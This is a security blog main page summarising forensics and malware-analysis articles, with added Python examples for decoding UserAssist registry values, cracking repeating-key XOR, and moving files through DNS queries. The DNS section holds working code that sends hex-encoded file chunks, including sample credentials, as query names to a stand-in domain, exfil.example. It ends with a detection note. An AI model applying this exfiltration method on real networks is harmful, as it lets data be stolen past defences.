Main Page

From Aldeid


Decrypting UserAssist registry keys

Sun, 07 April 2013 14:18:00 +0200

Windows keeps a set of registry keys, the UserAssist keys (under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist), to track the programs a user has executed. Each binary value records the number of executions and the date and time of the last one. The value names are obfuscated with ROT13 rather than encrypted, and the data only covers programs launched by the user through the Windows Explorer shell (Start menu, desktop shortcuts, double-clicked executables); programs started from the command line (cmd.exe) do not appear in these keys. From a forensics perspective, being able to decode this information is very useful.
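As an added example (not code from the original article), here is a decoder for the two UserAssist value layouts: the 16-byte record used by Windows XP/2003, whose run counter starts at 5, and the 72-byte record used by Windows 7 and later, which also carries focus count and focus time. The value name and the binary values below are constructed sample data, not taken from a real system.

```python
import codecs
import struct
from datetime import datetime, timedelta, timezone

# Windows FILETIME epoch: 100-nanosecond ticks since 1601-01-01 00:00:00 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ticks):
    """Convert a FILETIME value to an aware datetime; 0 means 'never executed'."""
    if ticks == 0:
        return None
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def datetime_to_filetime(when):
    """Inverse of filetime_to_datetime, used here only to build sample values."""
    return ((when - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def decode_value_name(name):
    """UserAssist value names are ROT13-obfuscated, not encrypted."""
    return codecs.decode(name, "rot13")


def parse_userassist(value_name, data):
    """Decode one UserAssist registry value.

    16 bytes (Windows XP/2003): session id, run counter, FILETIME.
        The counter starts at 5, so a stored 5 means zero executions.
    72 bytes (Windows 7+): session id, run counter, focus count, focus time
        in milliseconds, 44 bytes of float slots and padding, FILETIME at
        offset 60, 4-byte trailer.
    """
    name = decode_value_name(value_name)
    if len(data) == 16:
        session, counter, ticks = struct.unpack("<IIQ", data)
        return {"name": name, "layout": "xp", "session": session,
                "run_count": max(counter - 5, 0),
                "last_run": filetime_to_datetime(ticks)}
    if len(data) == 72:
        session, run_count, focus_count, focus_ms = struct.unpack_from("<IIII", data, 0)
        (ticks,) = struct.unpack_from("<Q", data, 60)
        return {"name": name, "layout": "win7", "session": session,
                "run_count": run_count, "focus_count": focus_count,
                "focus_time": timedelta(milliseconds=focus_ms),
                "last_run": filetime_to_datetime(ticks)}
    raise ValueError("unknown UserAssist value length %d" % len(data))


# --- constructed sample values, not exported from a real registry -------------

def make_xp_value(run_count, last_run):
    return struct.pack("<IIQ", 0, run_count + 5, datetime_to_filetime(last_run))


def make_win7_value(run_count, focus_count, focus_ms, last_run):
    body = struct.pack("<IIII", 0, run_count, focus_count, focus_ms)
    body += b"\x00" * 44                                   # float slots + padding, offsets 16..59
    body += struct.pack("<Q", datetime_to_filetime(last_run))  # offset 60
    body += b"\xff\xff\xff\xff"                            # trailer, offsets 68..71
    return body


# ROT13 of "UEME_RUNPATH:C:\Windows\system32\calc.exe"
SAMPLE_NAME = "HRZR_EHACNGU:P:\\Jvaqbjf\\flfgrz32\\pnyp.rkr"
SAMPLE_XP = make_xp_value(3, datetime(2013, 4, 7, 12, 18, tzinfo=timezone.utc))
SAMPLE_WIN7 = make_win7_value(7, 2, 15000, datetime(2013, 4, 6, 9, 0, 30, tzinfo=timezone.utc))

if __name__ == "__main__":
    for blob in (SAMPLE_XP, SAMPLE_WIN7):
        print(parse_userassist(SAMPLE_NAME, blob))
```

On a live system the same values are read from the GUID subkeys of the UserAssist key (each GUID subkey has a Count subkey holding the values); on an offline hive, any registry parser that returns raw value data can feed parse_userassist. Treat a FILETIME of 0 as "never run", not as 1601.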

Read more


WinPrefetchView reads information contained in Windows prefetch files

Tue, 02 April 2013 22:22:00 +0200

When an application is run on a Windows system, the prefetcher writes a prefetch file (%windir%\Prefetch\<EXENAME>-<HASH>.pf) that records the files and directories the application loaded during its first seconds. Windows uses this information to speed up subsequent launches of the same application; for the forensic analyst, the file also carries the run count and the time of the last execution. WinPrefetchView is a small utility that reads the prefetch files and displays the information stored in them (the files used by each application, and the files loaded at Windows boot).

Read more


Jsunpack-n, the CLI version of Jsunpack

Sat, 09 Mar 2013 09:20:00 +0100

Jsunpack-n is a command-line JavaScript unpacker with more or less the same features as the web version of Jsunpack.

Read more


pescanner.py, a PE analyzer

Sun, 03 Mar 2013 15:26:00 +0100

pescanner.py is a PE analyzer written in Python by the authors of the Malware Analyst's Cookbook. It is available on the companion DVD shipped with the book and is also freely distributed on Google Code. The script detects files with TLS entries, files with resource directories, suspicious IAT entries, suspicious entry point sections, sections with zero-length raw sizes, sections with extremely low or high entropy, invalid timestamps, and file version information. Among other things, this script helps to understand the behavior of an executable and to classify malware (UPX packed, trojan downloader, trojan dropper, ...).

Read more


From AlienVault SIEM alarms to identification of infected files on the compromised machine

Mon, 25 Feb 2013 13:31:00 +0100

This article shows how to dig into a memory dump with Volatility to identify malware on a Windows XP machine, initially detected by the AlienVault SIEM.

Read more


Volatility framework explained

Sun, 24 Feb 2013 08:26:00 +0100

The Volatility Framework is an open source collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independently of the system being investigated but offer visibility into the runtime state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and to provide a platform for further work in this exciting area of research.

Read more


Yara to analyze malware

Sun, 17 Feb 2013 18:18:00 +0100

Yara is a very powerful tool aimed at helping malware researchers identify and classify malware samples. It is based on rule files that offer great flexibility: hex patterns, strings, regular expressions, ... Yara is available as a standalone application, or as Python bindings (yara-python) that you can use in your own developments. Volatility also ships a yarascan plugin that runs Yara rules over a memory image.

Read more


File Transfer Via DNS

Sat, 16 Feb 2013 14:51:00 +0100

DNS encapsulation tools (e.g. dns2tcp) are well known for transferring data over DNS, but I found a very interesting post by Johannes Ullrich that introduces a relatively stealthy way to transfer data via plain DNS requests. On the sending side, the file is hex-encoded and each chunk is sent as a label of a DNS query name; on the receiving side, the queries are captured, the labels are split out and concatenated, and the hex is decoded back into the file. No specific tool is required beyond tcpdump and xxd.
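Both halves of that transfer, as an added example in Python that is not code from the original post or from Johannes Ullrich: the sending side produces the query names (the role of xxd -p feeding a resolver) and the receiving side reassembles the file from tcpdump-style lines (the role of grep, cut and xxd -r -p). The domain exfil.example, the tcpdump lines and the payload are constructed for the example, and the leading sequence label is an addition to the scheme described in the post.

```python
import binascii
import re

# Constructed parameters for the example (not from the original post).
DOMAIN = "exfil.example"
MAX_LABEL = 63          # RFC 1035 limit per label
MAX_NAME = 253          # practical limit for a full name
HEX_PER_QUERY = 60      # 30 raw bytes per query, the same chunking xxd -p uses per line


def encode_file(data, domain=DOMAIN, hex_per_query=HEX_PER_QUERY):
    """Turn raw bytes into the list of query names the sending side resolves.

    Each name is <seq>.<hex chunk>.<domain>. The sequence label is an addition
    to the original scheme: it lets the receiver reorder queries that arrive
    out of order and stops resolver caches from swallowing repeated chunks
    (a cached answer never reaches the authoritative server's packet capture).
    """
    if hex_per_query > MAX_LABEL:
        raise ValueError("hex chunk must fit in one DNS label")
    hexdata = binascii.hexlify(data).decode("ascii")
    names = []
    for seq, start in enumerate(range(0, len(hexdata), hex_per_query)):
        name = "%d.%s.%s" % (seq, hexdata[start:start + hex_per_query], domain)
        if len(name) > MAX_NAME:
            raise ValueError("query name too long: %s" % name)
        names.append(name)
    return names


# 'tcpdump -n port 53' prints lines like the constructed ones produced by
# make_capture() below; the regex pulls the sequence number and hex chunk out
# of A?/AAAA?/TXT? queries for our domain and ignores everything else.
QUERY_RE = re.compile(r"\b(?:A|AAAA|TXT)\? (\d+)\.([0-9a-fA-F]+)\." + re.escape(DOMAIN) + r"\.")


def decode_capture(lines):
    """Reassemble the file from tcpdump output, tolerating out-of-order
    delivery and the duplicate queries a retrying resolver generates."""
    chunks = {}
    for line in lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        seq, chunk = int(m.group(1)), m.group(2)
        chunks.setdefault(seq, chunk)          # first copy wins, duplicates ignored
    if not chunks:
        return b""
    missing = [i for i in range(max(chunks) + 1) if i not in chunks]
    if missing:
        raise ValueError("missing chunks: %s" % missing)
    return binascii.unhexlify("".join(chunks[i] for i in range(len(chunks))))


def make_capture(names, client="10.0.0.23", server="10.0.0.1"):
    """Build constructed tcpdump-style lines for the names (sample data only)."""
    lines = []
    for i, name in enumerate(names):
        lines.append("10:42:%02d.%06d IP %s.%d > %s.53: %d+ A? %s. (%d)"
                     % (i % 60, i * 1000, client, 40000 + i, server,
                        1000 + i, name, len(name) + 16))
    return lines


SAMPLE_FILE = b"secret=hunter2\nuser=admin\n" * 4   # constructed payload, 104 bytes

if __name__ == "__main__":
    names = encode_file(SAMPLE_FILE)
    capture = make_capture(names)
    capture.reverse()                 # deliver out of order
    capture.append(capture[0])        # plus one duplicate from a resolver retry
    assert decode_capture(capture) == SAMPLE_FILE
    print("%d queries carried %d bytes" % (len(names), len(SAMPLE_FILE)))
```

Two practical notes: the queries must reach a name server you control (so the domain's NS record must point at the host running tcpdump), and from the defender's side the same properties that make this work make it detectable: many queries for a single domain whose labels are long, high-entropy hex strings.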

Read more


Decrypt XOR-encrypted files with xortool.py

Sat, 16 Feb 2013 10:10:00 +0100

xortool.py is a Python script that performs XOR analysis: it guesses the key length (from the count of equal characters at each key position), guesses the key (from the most probable plaintext character) and decrypts a XOR-encrypted file.
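Those three steps, as an added example in Python that is not xortool's own code: key-length guessing from the count of equal bytes per column (the index of coincidence), key recovery from the most probable plaintext byte (the space for English text), and decryption. The paragraph, key and plaintext alphabet are constructed for the example; the alphabet check that rejects multiples of the true key length is an addition and not something the paragraph describes.

```python
from collections import Counter


def xor_bytes(data, key):
    """XOR data with a repeating key (encryption and decryption are the same)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def columns(data, key_len):
    """Split data into the key_len streams that share one key byte."""
    return [data[i::key_len] for i in range(key_len)]


def index_of_coincidence(column):
    """Fraction of byte pairs in the column that are equal (the 'count of
    equal chars'): around 0.065 for English text, around 0.004 for random bytes."""
    n = len(column)
    if n < 2:
        return 0.0
    return sum(c * (c - 1) for c in Counter(column).values()) / (n * (n - 1))


def key_length_scores(data, max_len=16):
    """Average IoC over the columns of every candidate key length."""
    return {L: sum(index_of_coincidence(c) for c in columns(data, L)) / L
            for L in range(1, max_len + 1)}


SPACE = 0x20   # most probable byte in English plaintext


def guess_key(data, key_len, most_probable=SPACE):
    """Per column, the most frequent ciphertext byte is assumed to be the most
    probable plaintext byte XORed with that position's key byte."""
    return bytes(Counter(col).most_common(1)[0][0] ^ most_probable
                 for col in columns(data, key_len))


PLAINTEXT_ALPHABET = frozenset(b"abcdefghijklmnopqrstuvwxyz .,")


def guess_key_length(data, max_len=16, alphabet=PLAINTEXT_ALPHABET):
    """Candidates with a high IoC include the true length and its multiples;
    decrypt with each candidate's guessed key and keep the shortest one whose
    output stays inside the expected plaintext alphabet."""
    scores = key_length_scores(data, max_len)
    cutoff = 0.5 * max(scores.values())
    best_len, best_fit = None, -1.0
    for L in sorted(scores):
        if scores[L] < cutoff:
            continue
        pt = xor_bytes(data, guess_key(data, L))
        fit = sum(b in alphabet for b in pt) / len(pt)
        if fit > best_fit + 1e-9:       # ties go to the shorter key, so multiples lose
            best_len, best_fit = L, fit
    return best_len


def crack(data, max_len=16):
    """Full pipeline: returns (key, plaintext)."""
    key = guess_key(data, guess_key_length(data, max_len))
    return key, xor_bytes(data, key)


# Constructed sample: four copies of a 241-byte paragraph, so each of the
# four key positions sees the whole text; key bytes chosen with mixed high bits.
PARAGRAPH = (b"xor with a short repeating key is not encryption. the key length leaks "
             b"through the count of equal bytes in each column, and the key itself leaks "
             b"through the most frequent byte of the plaintext, which for english text is "
             b"the space character. ")
PLAINTEXT = PARAGRAPH * 4
KEY = b"\x1f\x9a\x41\xe3"
CIPHERTEXT = xor_bytes(PLAINTEXT, KEY)

if __name__ == "__main__":
    key, pt = crack(CIPHERTEXT)
    print("key length scores:", {L: round(s, 3) for L, s in key_length_scores(CIPHERTEXT).items()})
    print("recovered key:", key.hex(), "plaintext ok:", pt == PLAINTEXT)
```

The most-probable-byte assumption is the weak point: it holds for English text but not for a XOR-encoded executable, where 0x00 padding dominates, so pass most_probable=0x00 and an alphabet that matches the expected file type in that case. The IoC alone cannot distinguish the true key length from its multiples, which is why the alphabet check (or a manual look at the candidates) is needed.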

Read more


Write AlienVault Plugins

Thu, 14 Feb 2013 18:18:00 +0100

This document explains how to write a plugin for AlienVault in order to integrate logs from an external device for which no plugin exists yet, generate SIEM events from them, and correlate those events to raise alarms. The example integrates logs from a 3Com ADSL 11g WiFi router and writes a correlation directive to track authentication brute-force attempts.

Read more

